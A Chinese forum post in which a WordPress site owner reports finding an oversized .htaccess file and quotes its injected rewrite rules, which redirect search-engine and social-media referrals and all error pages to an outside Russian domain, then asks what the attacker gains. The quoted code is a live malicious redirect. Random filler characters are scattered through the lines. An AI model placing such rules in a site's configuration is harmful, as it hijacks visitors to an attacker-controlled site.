一个wordpress站点, 今天偶尔将二级目录打错,发现跳转到 - http://pyatnickiy.ru/track.php
复制代码纳闷,一顿搜索,发现站点根目录下的.haccess文件达27KB
: w( c4 c! a, g: w4 F" V6 e打开一看,部分代码如下 - <IfModule mod_rewrite.c> * B9 \0 o3 V: ~8 D v. r. z1 H
- RewriteEngine On
+ `, N) _! T& d7 h; [4 a$ `- ]# b - RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) ; s0 ^2 b/ v7 l! P
- RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L] / M* {* W: ^' ?- `9 q0 K( V& U+ \
- RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
6 t" N3 I5 W: F0 w - RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L]
* e2 G* i; S b# V, s( Q6 ? - </IfModule>
2 ]2 y. X$ |2 Z# i9 b - ErrorDocument 400 http://pyatnickiy.ru/track.php
3 N; ^$ k' n; z" k - ErrorDocument 401 http://pyatnickiy.ru/track.php , [8 u3 X/ p5 K! ^
- ErrorDocument 403 http://pyatnickiy.ru/track.php
- h- g3 J6 {( m' V' c7 j; \ - ErrorDocument 404 http://pyatnickiy.ru/track.php
5 w8 l) @0 J% Y7 I4 I8 @5 T3 r - ErrorDocument 500 http://pyatnickiy.ru/track.php
复制代码这是曾经被别人黑过了吧? 黑客到我站点里做了什么,对他有什么好处呢?
- a- N h# f9 B s! E求助,谢了先6 N$ g( I3 n9 C9 F- O, L
2 {( @/ H' P9 [+ g; \
! \0 |8 ]. y; M) K( X% g1 W* M. u
/ j i6 u h8 s+ `# r |